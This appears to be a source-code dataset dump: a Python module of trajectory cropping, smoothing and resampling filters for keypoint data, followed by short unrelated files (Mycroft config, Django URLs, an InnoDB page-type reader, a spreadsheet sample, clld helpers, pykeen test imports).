ostadabbas/HW-HuP
|
0a7b4263f72e7ff7f9bc4c81366569822c3ee248
|
[
"MIT"
] | 9
|
2019-07-11T23:37:36.000Z
|
2022-02-02T00:22:55.000Z
|
import numpy as np
from functools import partial
from scipy import interpolate, signal
import pykalman
class Crop_Filter(object):
"""
The x, y coordinates of the trajectory were captured by some keypoint detection algorithms (e.g. Openpose).
Sometimes objects will be placed in the background and the depth coordinates may register as invalid values.
The Crop-Filter crops the invalid values and runs some interpolation methods to replace them.
"""
def __init__(self,flag='pchip',min_valid_value=100,max_valid_value=1300):
"""
:param flag: string, specifies the method for crop filtering on the data,
such as "zero","linear","slinear","quadratic","cubic","previous","next","nearest".
'pchip': PCHIP 1-d monotonic cubic interpolation, refer to 'Monotone Piecewise Cubic Interpolation'
'akima': Akima 1D Interpolator, refer to 'A new method of interpolation and smooth curve fitting based on local procedures'
:param min_valid_value: float, crop-filter the value < min_valid_value
:param max_valid_value: float, crop-filter the value > max_valid_value
"""
self.flag=flag
self.min_value = min_valid_value
self.max_value = max_valid_value
if flag in ["zero","linear","slinear","quadratic","cubic","previous","next","nearest"]:
self.filter = partial(interpolate.interp1d,kind=flag)
elif flag=='pchip' or flag=='PchipInterpolator':
self.filter = interpolate.PchipInterpolator
elif flag=='akima' or flag=='Akima1DInterpolator':
self.filter = interpolate.Akima1DInterpolator
if flag not in self.all_flags:
            raise ValueError('invalid flags. Only support: {}'.format(self.all_flags))
def smooth_trajectory_1d(self,trajectory_1d):
"""
smooth the 1-d trajectory or time-series data
:param trajectory_1d: numpy array, shape of (time_step,)
:return: numpy-array, smoothed trajectory, same shape as input trajectory_1d
"""
valid_ind_s = np.where(trajectory_1d >= self.min_value)[0]
valid_ind_l = np.where(trajectory_1d <= self.max_value)[0]
valid_ind = np.intersect1d(valid_ind_s,valid_ind_l,return_indices=False)
if len(valid_ind)==len(trajectory_1d):
return trajectory_1d
t = np.arange(len(trajectory_1d))
interp_fn = self.filter(valid_ind,trajectory_1d[valid_ind])
left_ind,right_ind = valid_ind[0],valid_ind[-1]
smoothed_ind = t[left_ind:right_ind+1]
        smoothed_1d = interp_fn(smoothed_ind)  # only interpolate the middle part
if left_ind>0:
left_val = trajectory_1d[left_ind]*np.ones(left_ind)
smoothed_1d = np.concatenate([left_val,smoothed_1d])
if right_ind<len(trajectory_1d)-1:
right_val = trajectory_1d[right_ind]*np.ones(len(trajectory_1d)-1-right_ind)
smoothed_1d = np.concatenate([smoothed_1d,right_val])
return smoothed_1d
def smooth_trajectory(self,trajectory):
"""
smooth the trajectory time-series data
:param trajectory: numpy array, shape of (time_step,coordinate_dim)
:return: numpy-array, smoothed trajectory, same shape as input trajectory
"""
trajectory=np.array(trajectory)
if len(trajectory.shape)<2:
trajectory=np.expand_dims(trajectory, axis=1)
time_step, dim = trajectory.shape[:2]
smoothed = trajectory.copy()
for ii in range(dim):
smoothed[:,ii] = self.smooth_trajectory_1d(trajectory[:,ii])
return smoothed
def smooth_multi_trajectories(self,trajectories):
"""
smooth the multi-joint trajectories
:param trajectories: numpy array, shape of (time_step,joint_num, coordinate_dim)
:return: numpy-array, smoothed trajectories, same shape as input trajectories
"""
trajectories=np.array(trajectories)
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
joint_num = trajectories.shape[1]
multi_joint_smoothed = trajectories.copy()
for ii in range(joint_num):
multi_joint_smoothed[:,ii] = self.smooth_trajectory(trajectories[:,ii])
return multi_joint_smoothed
@property
def all_flags(self):
flags=[
"zero",
"linear",
"slinear",
"quadratic",
"cubic",
"previous",
"next",
"nearest",
'pchip',#PchipInterpolator
'PchipInterpolator',
'akima',#Akima1DInterpolator
]
return flags
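# ---------------------------------------------------------------------------
# Editor's note: a minimal, hypothetical usage sketch for Crop_Filter, not
# part of the original module. The depth values and thresholds below are
# illustrative: the samples of 0 (sensor dropout) and 1350 (background) fall
# outside [min_valid_value, max_valid_value] and are replaced by interpolation.
def _crop_filter_example():
    depth_1d = np.array([820., 815., 0., 0., 790., 1350., 780.])
    crop_filter = Crop_Filter(flag='pchip', min_valid_value=100, max_valid_value=1300)
    return crop_filter.smooth_trajectory_1d(depth_1d)
# ---------------------------------------------------------------------------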
class GradientCrop_Filter(object):
"""
The x, y coordinates of the trajectory were captured by some keypoint detection algorithms (e.g. Openpose).
Sometimes objects will be placed in the background and the depth coordinates may register as invalid values.
    The GradientCrop_Filter crops large-gradient values that may be mis-classified as background
"""
def __init__(self,flag='pchip',max_valid_gradient=50):
"""
:param flag: string, specifies the method for crop filtering on the data,
such as "zero","linear","slinear","quadratic","cubic","previous","next","nearest".
'pchip': PCHIP 1-d monotonic cubic interpolation, refer to 'Monotone Piecewise Cubic Interpolation'
'akima': Akima 1D Interpolator, refer to 'A new method of interpolation and smooth curve fitting based on local procedures'
:param max_valid_gradient: float, crop-filter the gradient > max_valid_gradient
"""
self.flag=flag
self.max_valid_gradient = max_valid_gradient
if flag in ["zero","linear","slinear","quadratic","cubic","previous","next","nearest"]:
self.filter = partial(interpolate.interp1d,kind=flag)
elif flag=='pchip' or flag=='PchipInterpolator':
self.filter = interpolate.PchipInterpolator
elif flag=='akima' or flag=='Akima1DInterpolator':
self.filter = interpolate.Akima1DInterpolator
if flag not in self.all_flags:
            raise ValueError('invalid flags. Only support: {}'.format(self.all_flags))
def smooth_trajectory_1d(self,trajectory_1d):
"""
smooth the 1-d trajectory or time-series data
:param trajectory_1d: numpy array, shape of (time_step,)
:return: numpy-array, smoothed trajectory, same shape as input trajectory_1d
"""
valid_ind = []
valid_value = trajectory_1d[0]
for ii, val in enumerate(trajectory_1d):
if abs(valid_value - val) < self.max_valid_gradient :
valid_value = val
valid_ind.append(ii)
elif ii ==len(trajectory_1d)-1:
valid_ind.append(ii)
if len(valid_ind)==len(trajectory_1d):
return trajectory_1d
t = np.arange(len(trajectory_1d))
interp_fn = self.filter(valid_ind,trajectory_1d[valid_ind])
left_ind,right_ind = valid_ind[0],valid_ind[-1]
smoothed_ind = t[left_ind:right_ind+1]
        smoothed_1d = interp_fn(smoothed_ind)  # only interpolate the middle part
if left_ind>0:
left_val = trajectory_1d[left_ind]*np.ones(left_ind)
smoothed_1d = np.concatenate([left_val,smoothed_1d])
if right_ind<len(trajectory_1d)-1:
right_val = trajectory_1d[right_ind]*np.ones(len(trajectory_1d)-1-right_ind)
smoothed_1d = np.concatenate([smoothed_1d,right_val])
return smoothed_1d
def smooth_trajectory(self,trajectory):
"""
smooth the trajectory time-series data
:param trajectory: numpy array, shape of (time_step,coordinate_dim)
:return: numpy-array, smoothed trajectory, same shape as input trajectory
"""
trajectory=np.array(trajectory)
if len(trajectory.shape)<2:
trajectory=np.expand_dims(trajectory, axis=1)
time_step, dim = trajectory.shape[:2]
smoothed = trajectory.copy()
for ii in range(dim):
smoothed[:,ii] = self.smooth_trajectory_1d(trajectory[:,ii])
return smoothed
def smooth_multi_trajectories(self,trajectories):
"""
smooth the multi-joint trajectories
:param trajectories: numpy array, shape of (time_step,joint_num, coordinate_dim)
:return: numpy-array, smoothed trajectories, same shape as input trajectories
"""
trajectories=np.array(trajectories)
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
joint_num = trajectories.shape[1]
multi_joint_smoothed = trajectories.copy()
for ii in range(joint_num):
multi_joint_smoothed[:,ii] = self.smooth_trajectory(trajectories[:,ii])
return multi_joint_smoothed
@property
def all_flags(self):
flags=[
"zero",
"linear",
"slinear",
"quadratic",
"cubic",
"previous",
"next",
"nearest",
'pchip',#PchipInterpolator
'PchipInterpolator',
'akima',#Akima1DInterpolator
]
return flags
class Smooth_Filter(object):
"""
Smooth the trajectory data
"""
def __init__(self,flag='kalman',kernel_size=3, decay_rate=0.6):
"""
:param flag: string, specifies the method for smooth filtering,
'kalman': kalman filter
'wiener': weiner filter
'median': median filter
'moving_average' or 'ma': moving average filter
'weighted_moving_average' or 'wma': weighted moving average filter
'exponential_moving_average' or 'ema': exponential moving average
:param kernel_size: int, kernel size for median filter or wiener filter or moving average filter
:param decay_rate: float, decay rate for exponential moving average or weighted moving average filter
"""
self.flag = flag
self.kernel_size = kernel_size
self.decay_rate = decay_rate
if self.flag=='median':
self.filter = partial(self._median_filter,kernel_size=kernel_size)
elif self.flag=='wiener':
self.filter = partial(self._wiener_filter, kernel_size=kernel_size)
elif self.flag=='kalman':
self.filter = self._kalman_filter
elif self.flag=='moving_average' or self.flag=='ma':
self.filter = partial(self._ma_filter, kernel_size=kernel_size)
elif self.flag=='exponential_moving_average' or self.flag=='ema':
self.filter = partial(self._ema_filter, decay_rate=decay_rate)
elif self.flag=='weighted_moving_average' or self.flag=='wma':
self.filter = partial(self._wma_filter, decay_rate=decay_rate)
if flag not in self.all_flags:
            raise ValueError('invalid flags. Only support: {}'.format(self.all_flags))
def _median_filter(self, trajectory,kernel_size):
"""
smooth the time series data with median filter
:param trajectory: numpy-array
:param kernel_size: int, the size of the median filter window
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
filt_traj[:,ii] = signal.medfilt(trajectory[:,ii], kernel_size=kernel_size)
filt_traj[:, 0] = filt_traj[:, 1]
filt_traj[:, -1] = filt_traj[:, -2]
return filt_traj
def _wiener_filter(self,trajectory,kernel_size):
"""
smooth the time series data with Wiener filter
:param trajectory: numpy-array
:param kernel_size: int, the size of the Wiener filter window
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
filt_traj[:,ii] = signal.wiener(trajectory[:,ii], mysize=kernel_size)
filt_traj[:, 0] = filt_traj[:, 1]
filt_traj[:, -1] = filt_traj[:, -2]
return filt_traj
def _kalman_filter(self,trajectory):
"""
smooth the time series data with Kalman filter
:param trajectory: numpy-array
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
self.kf = pykalman.KalmanFilter(n_dim_obs=dim, n_dim_state=dim,initial_state_mean=trajectory[0])
state_mean, state_covariance = self.kf.filter(trajectory)
filt_traj = state_mean
return filt_traj
def _ma_filter(self,trajectory,kernel_size):
"""
smooth the time series data with moving average
:param trajectory: numpy-array
:param kernel_size: int, the size of the moving average filter window
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
r = np.arange(1, kernel_size - 1, 2)
for ii in range(dim):
a = trajectory[:,ii]
out0 = np.convolve(a, np.ones(kernel_size, dtype=int), 'valid') / kernel_size
start = np.cumsum(a[:kernel_size - 1])[::2] / r
stop = (np.cumsum(a[:-kernel_size:-1])[::2] / r)[::-1]
filt_traj[:,ii] = np.concatenate((start, out0, stop))
return filt_traj
def _ema_filter(self,trajectory,decay_rate):
"""
smooth the time series data with exponential moving average
:param trajectory: numpy-array
:param decay_rate: float, decay rate for exponential moving average
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
a = trajectory[:,ii]
smoothed = [a[0]]
for val in a[1:]:
new_val = decay_rate * val + (1 - decay_rate) * smoothed[-1]
smoothed.append(new_val)
filt_traj[:, ii] = np.array(smoothed)
return filt_traj
def _wma_filter(self,trajectory,decay_rate):
"""
smooth the time series data with weighted moving average
:param trajectory: numpy-array
:param decay_rate: float, decay rate for weighted moving average
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
a = trajectory[:,ii]
smoothed = [a[0]]
for jj in range(1,len(a)):
new_val = decay_rate * a[jj] + (1 - decay_rate) * a[jj-1]
smoothed.append(new_val)
filt_traj[:, ii] = np.array(smoothed)
return filt_traj
def smooth_trajectory(self,trajectory):
"""
smooth the time series data
:param trajectory: numpy array, shape of (time_step,coordinate_dim)
:return: numpy-array, smoothed time series data, same shape as input series
"""
trajectory=np.array(trajectory)
if len(trajectory.shape)<2:
trajectory=trajectory.reshape(trajectory.shape[0],1)
smoothed=self.filter(trajectory)
return smoothed
def smooth_multi_trajectories(self,trajectories):
"""
smooth the multi-joint-trajectories data
:param trajectories: numpy array, shape of (time_step,joint_num, coordinate_dim)
:return: numpy-array, smoothed trajectories, same shape as input trajectories
"""
trajectories=np.array(trajectories)
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
joint_num = trajectories.shape[1]
multi_joint_smoothed = trajectories.copy()
for ii in range(joint_num):
multi_joint_smoothed[:,ii] = self.smooth_trajectory(trajectories[:,ii])
return multi_joint_smoothed
@property
def all_flags(self):
flags=[
"median",
"wiener",
"kalman",
"moving_average",
"ma",
"exponential_moving_average",
"ema",
"weighted_moving_average",
"wma",
]
return flags
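# ---------------------------------------------------------------------------
# Editor's note: a minimal, hypothetical usage sketch for Smooth_Filter, not
# part of the original module. The random-walk trajectory is illustrative;
# any flag listed in ``all_flags`` can replace 'kalman'.
def _smooth_filter_example():
    noisy = np.cumsum(np.random.randn(100, 2), axis=0)  # shape (time_step, dim)
    smoother = Smooth_Filter(flag='kalman')
    smoothed = smoother.smooth_trajectory(noisy)
    return smoothed  # same shape as the input, (100, 2)
# ---------------------------------------------------------------------------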
class Motion_Sampler(object):
"""
For up-sampling or under-sampling in time-series data
"""
def __init__(self,motion_threshold=15,min_time_step=30,
interpolator='pchip',interpolate_ratio=[3,2,1],interpolate_threshold=[50,100]):
"""
:param motion_threshold: float, threshold for motion-detection.
            If x(t) - x(t-1) < motion_threshold, the object is considered not to have moved from 't-1' to 't'
:param min_time_step: int, minimum remaining time-step after motion-detect under sampling.
:param interpolator: string, method for interplation for up-sampling the trajectory data,
such as "zero","linear","slinear","quadratic","cubic","previous","next","nearest".
'pchip': PCHIP 1-d monotonic cubic interpolation, 'Monotone Piecewise Cubic Interpolation'
'akima': Akima 1D Interpolator, 'A new method of interpolation and smooth curve fitting based on local procedures'
:param interpolate_ratio: list of int, interpolation ratio for up-sampling
        :param interpolate_threshold: list of int, interpolation thresholds for up-sampling
e.g. if len(data)<interpolate_threshold[0], then ratio = interpolate_ratio[0]
"""
self.motion_threshold=motion_threshold
self.min_time_step = min_time_step
self.interpolate_ratio = interpolate_ratio
self.interpolate_threshold = interpolate_threshold
if interpolator in ["zero","linear","slinear","quadratic","cubic","previous","next","nearest"]:
self.interpolator = partial(interpolate.interp1d,kind=interpolator)
elif interpolator=='pchip' or interpolator=='PchipInterpolator':
self.interpolator = interpolate.PchipInterpolator
elif interpolator=='akima' or interpolator=='Akima1DInterpolator':
self.interpolator = interpolate.Akima1DInterpolator
def motion_detection(self,trajectory,thresh=None):
"""
Remove the non-moving part of the trajectory. (Just keep the significant movements)
:param trajectory: numpy-array, shape of (time_step, *, coordinate_dim)
:param thresh: float, threshold for motion-detection.
:return: numpy-array. the new trajectory that filtered out the no-moving-part, have the same shape of the input trajectory
"""
if thresh is None:
thresh = self.motion_threshold
motion_data = [trajectory[0]]
left_valid_ind = int(2*len(trajectory)/5)
right_valid_ind = int(3*len(trajectory)/5)
for ii in range(1, len(trajectory)):
diff = np.sum(np.abs(trajectory[ii] - motion_data[-1]))
if diff >= thresh or (ii>=left_valid_ind and ii<=right_valid_ind):
motion_data.append(trajectory[ii])
        if len(motion_data) < self.min_time_step and thresh > 0:
            motion_data = self.motion_detection(trajectory, thresh // 2)
motion_data = np.array(motion_data)
return motion_data
def interpolate_trajectory(self,trajectory):
"""
interpolate and upsample the trajectory
:param trajectory: numpy-array, shape of (time_step, coordinate_dim)
:return: interpolated trajectory, which has a shape of (interpolate_ratio*time_step, coordinate_dim)
"""
if len(trajectory.shape)<2:
trajectory=np.expand_dims(trajectory, axis=1)
L,feat_dim =trajectory.shape[:2]
t=np.arange(L)
ratio = self.interpolate_ratio[0]
for rat, thr in zip (self.interpolate_ratio[1:],self.interpolate_threshold):
if L>thr:
ratio=rat
if ratio<=1:
return trajectory
new_t = [ii/ratio for ii in list(range(ratio*(L-1)+1))]
interp_data=np.zeros((len(new_t),feat_dim))
for jj in range(feat_dim):
f = self.interpolator(t, trajectory[:,jj])
new_traj = f(new_t)
interp_data[:,jj] = new_traj
return interp_data
def interpolate_multi_trajectories(self,trajectories):
"""
interpolate and upsample the multi-joint-trajectory
:param trajectory: numpy-array, shape of (time_step, joint_num, coordinate_dim)
:return: interpolated trajectory, which has a shape of (interpolate_ratio*time_step, joint_num, coordinate_dim)
"""
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
L,joint_num, feat_dim = trajectories.shape[:3]
ratio = self.interpolate_ratio[0]
for rat, thr in zip(self.interpolate_ratio[1:],self.interpolate_threshold):
if L>thr:
ratio=rat
new_t = [ii/ratio for ii in list(range(ratio*(L-1)+1))]
multi_interpolated=np.zeros((len(new_t),joint_num,feat_dim))
for ii in range(joint_num):
multi_interpolated[:, ii] = self.interpolate_trajectory(trajectories[:, ii])
return multi_interpolated
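# ---------------------------------------------------------------------------
# Editor's note: a hypothetical end-to-end sketch (not part of the original
# module) combining the classes above: crop invalid depth samples, smooth the
# result, keep only the moving part, then up-sample it. Parameter values are
# illustrative; the input is assumed to be shaped (time_step, coordinate_dim).
def _trajectory_pipeline_example(raw_trajectory):
    cropped = Crop_Filter(flag='pchip').smooth_trajectory(raw_trajectory)
    smoothed = Smooth_Filter(flag='kalman').smooth_trajectory(cropped)
    sampler = Motion_Sampler(motion_threshold=15, min_time_step=30)
    moving_part = sampler.motion_detection(smoothed)
    return sampler.interpolate_trajectory(moving_part)
# ---------------------------------------------------------------------------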
| 37.830957
| 127
| 0.736312
|
9f741660eadb5cd7f49051b2bee259c9ef819d29
| 790
|
py
|
Python
|
mycroft/configuration/__init__.py
|
HelloChatterbox/mycroft-core
|
c417807d32eff629354ffe740da14caed2a1bee5
|
[
"Apache-2.0"
] | 1
|
2021-05-04T20:59:48.000Z
|
2021-05-04T20:59:48.000Z
|
mycroft/configuration/__init__.py
|
HelloChatterbox/mycroft-core
|
c417807d32eff629354ffe740da14caed2a1bee5
|
[
"Apache-2.0"
] | 5
|
2021-04-13T22:54:47.000Z
|
2021-04-18T14:24:25.000Z
|
mycroft/configuration/__init__.py
|
HelloChatterbox/mycroft-lib
|
c417807d32eff629354ffe740da14caed2a1bee5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from mycroft.configuration.config import Configuration, LocalConf, RemoteConf
from mycroft.configuration.locale import set_default_lf_lang
from mycroft.configuration.locations import SYSTEM_CONFIG, USER_CONFIG
| 43.888889
| 77
| 0.793671
|
79e2c2febdf8734ae42c6ade81300b4e0b87eb1c
| 797
|
py
|
Python
|
compileio/urls.py
|
unownone/Online_Compiler
|
b10f147f25210c4daad987a8cee30f5185e2d332
|
[
"MIT"
] | 2
|
2021-07-23T14:01:14.000Z
|
2021-07-23T14:47:08.000Z
|
compileio/urls.py
|
unownone/Online_Compiler
|
b10f147f25210c4daad987a8cee30f5185e2d332
|
[
"MIT"
] | null | null | null |
compileio/urls.py
|
unownone/Online_Compiler
|
b10f147f25210c4daad987a8cee30f5185e2d332
|
[
"MIT"
] | 1
|
2021-11-01T06:12:44.000Z
|
2021-11-01T06:12:44.000Z
|
"""compileio URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('compileo.urls'))
]
| 34.652174
| 77
| 0.706399
|
36c797dc1ebe5f81f0c311083c7d168afa7bd650
| 2,179
|
py
|
Python
|
mysql/innodb_page_type/mylib.py
|
DonghuaLau/linux-ammo
|
ed53e0c87dc32f0f7aa4b5bdcf1f8d8029872c06
|
[
"Apache-2.0"
] | null | null | null |
mysql/innodb_page_type/mylib.py
|
DonghuaLau/linux-ammo
|
ed53e0c87dc32f0f7aa4b5bdcf1f8d8029872c06
|
[
"Apache-2.0"
] | null | null | null |
mysql/innodb_page_type/mylib.py
|
DonghuaLau/linux-ammo
|
ed53e0c87dc32f0f7aa4b5bdcf1f8d8029872c06
|
[
"Apache-2.0"
] | null | null | null |
#encoding=utf-8
import os
import include
from include import *
TABLESPACE_NAME='D:\\mysql_data\\test\\t.ibd'
VARIABLE_FIELD_COUNT = 1
NULL_FIELD_COUNT = 0
class myargv(object):
def __init__(self, argv):
self.argv = argv
self.parms = {}
self.tablespace = ''
def parse_cmdline(self):
argv = self.argv
if len(argv) == 1:
print 'Usage: python py_innodb_page_info.py [OPTIONS] tablespace_file'
print 'For more options, use python py_innodb_page_info.py -h'
return 0
while argv:
if argv[0][0] == '-':
if argv[0][1] == 'h':
self.parms[argv[0]] = ''
argv = argv[1:]
break
if argv[0][1] == 'v':
self.parms[argv[0]] = ''
argv = argv[1:]
else:
self.parms[argv[0]] = argv[1]
argv = argv[2:]
else:
self.tablespace = argv[0]
argv = argv[1:]
if self.parms.has_key('-h'):
print 'Get InnoDB Page Info'
print 'Usage: python py_innodb_page_info.py [OPTIONS] tablespace_file\n'
print 'The following options may be given as the first argument:'
print '-h help '
print '-o output put the result to file'
            print '-t number of threads to analyze the tablespace file'
print '-v verbose mode'
return 0
return 1
def mach_read_from_n(page,start_offset,length):
ret = page[start_offset:start_offset+length]
return ret.encode('hex')
def get_innodb_page_type(myargv):
f=file(myargv.tablespace,'rb')
fsize = os.path.getsize(f.name)/INNODB_PAGE_SIZE
ret = {}
for i in range(fsize):
page = f.read(INNODB_PAGE_SIZE)
page_offset = mach_read_from_n(page,FIL_PAGE_OFFSET,4)
page_type = mach_read_from_n(page,FIL_PAGE_TYPE,2)
if myargv.parms.has_key('-v'):
if page_type == '45bf':
page_level = mach_read_from_n(page,FIL_PAGE_DATA+PAGE_LEVEL,2)
print "page offset %s, page type <%s>, page level <%s>"%(page_offset,innodb_page_type[page_type],page_level)
else:
print "page offset %s, page type <%s>"%(page_offset,innodb_page_type[page_type])
if not ret.has_key(page_type):
ret[page_type] = 1
else:
ret[page_type] = ret[page_type] + 1
print "Total number of page: %d:"%fsize
for type in ret:
print "%s: %s"%(innodb_page_type[type],ret[type])
| 29.849315
| 112
| 0.672327
|
3dc8c16bb9213d97f244daa2803cecd30c566fb0
| 2,681
|
py
|
Python
|
sample.py
|
jaraco/xlsxcessive
|
292d2fb90ebf07781c684f1b8d42f89ffc58d3c2
|
[
"MIT"
] | 3
|
2019-02-06T14:03:58.000Z
|
2021-02-13T20:07:09.000Z
|
sample.py
|
jaraco/xlsxcessive
|
292d2fb90ebf07781c684f1b8d42f89ffc58d3c2
|
[
"MIT"
] | 1
|
2020-11-30T15:43:01.000Z
|
2021-02-13T19:27:00.000Z
|
sample.py
|
jaraco/xlsxcessive
|
292d2fb90ebf07781c684f1b8d42f89ffc58d3c2
|
[
"MIT"
] | 1
|
2019-02-05T14:38:48.000Z
|
2019-02-05T14:38:48.000Z
|
"""Just a simple example of XlsXcessive API usage."""
from xlsxcessive.workbook import Workbook
from xlsxcessive.worksheet import Cell
wb = Workbook()
sheet = wb.new_sheet('Test Sheet')
# a shared format
bigguy = wb.stylesheet.new_format()
bigguy.font(size=24)
bigguy.align('center')
# add a border
bigguy.border(top="medium", bottom="medium")
# set a builtin number format
bigguy.number_format('0.00')
# another shared format
boldfont = wb.stylesheet.new_format()
boldfont.font(bold=True)
# and another
highprec = wb.stylesheet.new_format()
# set a custom number format on the shared format
highprec.number_format("0.000")
# the API supports adding rows
row1 = sheet.row(1)
# rows support adding cells - cells can currently store strings, numbers
# and formulas.
a1 = row1.cell("A1", "Hello, World!", format=boldfont)
row1.cell("C1", 42.0, format=bigguy)
# cells can be merged with other cells - there is no checking on invalid merges
# though. merge at your own risk!
a1.merge(Cell('B1'))
# adding rows is easy
row2 = sheet.row(2)
row2.cell("B2", "Foo")
row2.cell("C2", 1, format=bigguy)
# formulas are written as strings and can have default values
shared_formula = sheet.formula("SUM(C1, C2)", 43.0, shared=True)
row3 = sheet.row(3)
row3.cell("C3", shared_formula, format=bigguy)
# you can work with cells directly on the sheet
sheet.cell('D1', 12.0005, format=highprec)
sheet.cell('D2', 11.9995, format=highprec)
sheet.cell('D3', shared_formula, format=highprec)
# and directly via row and column indicies
sheet.cell(coords=(0, 4), value=40)
sheet.cell(coords=(1, 4), value=2)
sheet.cell(coords=(2, 4), value=shared_formula)
# you can share a formula in a non-contiguous range of cells
times_two = sheet.formula('PRODUCT(A4, 2)', shared=True)
sheet.cell('A4', 12)
sheet.cell('B4', times_two)
sheet.cell('C4', 50)
sheet.cell('D4', times_two)
# iteratively adding data is easy now
for rowidx in range(5, 10):
for colidx in range(5, 11, 2):
sheet.cell(coords=(rowidx, colidx), value=rowidx * colidx)
# set column widths
sheet.col(number=2, width=5)
# write unicode value
sheet.cell('G2', value=u"43\u00b0")
if __name__ == '__main__':
import os
import sys
from xlsxcessive.xlsx import save
if len(sys.argv) == 1:
print("USAGE: python sample.py NEWFILEPATH")
print("Writes a sample .xlsx file to NEWFILEPATH")
raise SystemExit(1)
if os.path.exists(sys.argv[1]):
print("Aborted. File', sys.argv[1], 'already exists.")
raise SystemExit(1)
stream = None
if sys.argv[1] == '-':
stream = sys.stdout
# wb is the Workbook created above
save(wb, sys.argv[1], stream)
| 26.284314
| 79
| 0.700858
|
1adddad957388bd55d1afec3d976dc5d36eb9c06
| 359
|
py
|
Python
|
tests/video_with_line.py
|
FRCTeam1073-TheForceTeam/openmv21
|
b5a5d9b4da172861b012e559df7bd640fc6b9e72
|
[
"MIT"
] | 1
|
2021-07-07T15:33:31.000Z
|
2021-07-07T15:33:31.000Z
|
tests/video_with_line.py
|
FRCTeam1073-TheForceTeam/openmv21
|
b5a5d9b4da172861b012e559df7bd640fc6b9e72
|
[
"MIT"
] | null | null | null |
tests/video_with_line.py
|
FRCTeam1073-TheForceTeam/openmv21
|
b5a5d9b4da172861b012e559df7bd640fc6b9e72
|
[
"MIT"
] | null | null | null |
import image, pyb, time
clock = time.clock()
img_reader = image.ImageIO("/test_stream.bin", "r")
while(True):
clock.tick()
img = img_reader.read(copy_to_fb=True, loop=True, pause=True)
img.draw_line((0, 0, img.width(), img.height()), color = (255, 0, 0), thickness = 10)
img.draw_rectangle(104,79,119,96)
    time.sleep(1)
img_reader.close()
| 25.642857
| 89
| 0.662953
|
51e63fb57fc9d3ad0d689793ef83ceb2019219be
| 672
|
py
|
Python
|
valpal/util.py
|
clld/valpal
|
52187bc5c332c042d4e52bb05dca91f5d71e1657
|
[
"Apache-2.0"
] | null | null | null |
valpal/util.py
|
clld/valpal
|
52187bc5c332c042d4e52bb05dca91f5d71e1657
|
[
"Apache-2.0"
] | 2
|
2020-09-08T14:27:07.000Z
|
2021-10-18T14:15:39.000Z
|
valpal/util.py
|
clld/valpal
|
52187bc5c332c042d4e52bb05dca91f5d71e1657
|
[
"Apache-2.0"
] | null | null | null |
from clld.db.models.common import Contribution
from clld.interfaces import IRepresentation
from clld.web.adapters import get_adapter
def dataset_detail_html(context=None, request=None, **kw):
return {
'example_contribution': Contribution.get('icel1247'),
'citation': get_adapter(IRepresentation, context, request, ext='md.txt'),
'bibtex': get_adapter(IRepresentation, context, request, ext='md.bib')}
def contribution_detail_html(context=None, request=None, **kw):
return {
'citation': get_adapter(IRepresentation, context, request, ext='md.txt'),
'bibtex': get_adapter(IRepresentation, context, request, ext='md.bib')}
| 39.529412
| 81
| 0.724702
|
41b6c96307766690f7c989284ae94e16d9aaac8a
| 3,073
|
py
|
Python
|
tests/test_sampling/test_negative_samplers.py
|
Rodrigo-A-Pereira/pykeen
|
76c5acb707faa524b5951b0d1d85ab1afe806462
|
[
"MIT"
] | null | null | null |
tests/test_sampling/test_negative_samplers.py
|
Rodrigo-A-Pereira/pykeen
|
76c5acb707faa524b5951b0d1d85ab1afe806462
|
[
"MIT"
] | null | null | null |
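# ---------------------------------------------------------------------------
# Editor's note: a hypothetical sketch of the models that would generate a
# migration like the one above (field names, choices and validators are taken
# from the migration itself; `validate_username` is assumed to be defined in
# examWeb/web/models.py alongside these models). Kept commented out because a
# migration module is not the place to declare models.
#
# from django.core import validators
# from django.db import models
#
# class Album(models.Model):
#     album_name = models.CharField(max_length=30, unique=True)
#     artist = models.CharField(max_length=30)
#     genre = models.CharField(max_length=30, choices=[...])  # same choices as above
#     description = models.TextField(blank=True, null=True)
#     image_url = models.URLField()
#     price = models.FloatField(validators=[validators.MinValueValidator(0.0)])
#
# class Profile(models.Model):
#     username = models.CharField(max_length=15,
#                                 validators=[validators.MinLengthValidator(2), validate_username])
#     email = models.EmailField(max_length=254)
#     age = models.IntegerField(blank=True, null=True,
#                               validators=[validators.MinValueValidator(0)])
# ---------------------------------------------------------------------------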
tests/test_sampling/test_negative_samplers.py
|
Rodrigo-A-Pereira/pykeen
|
76c5acb707faa524b5951b0d1d85ab1afe806462
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Test that samplers can be executed."""
from pykeen.sampling import BasicNegativeSampler, BernoulliNegativeSampler, PseudoTypedNegativeSampler
from pykeen.sampling.pseudo_type import create_index
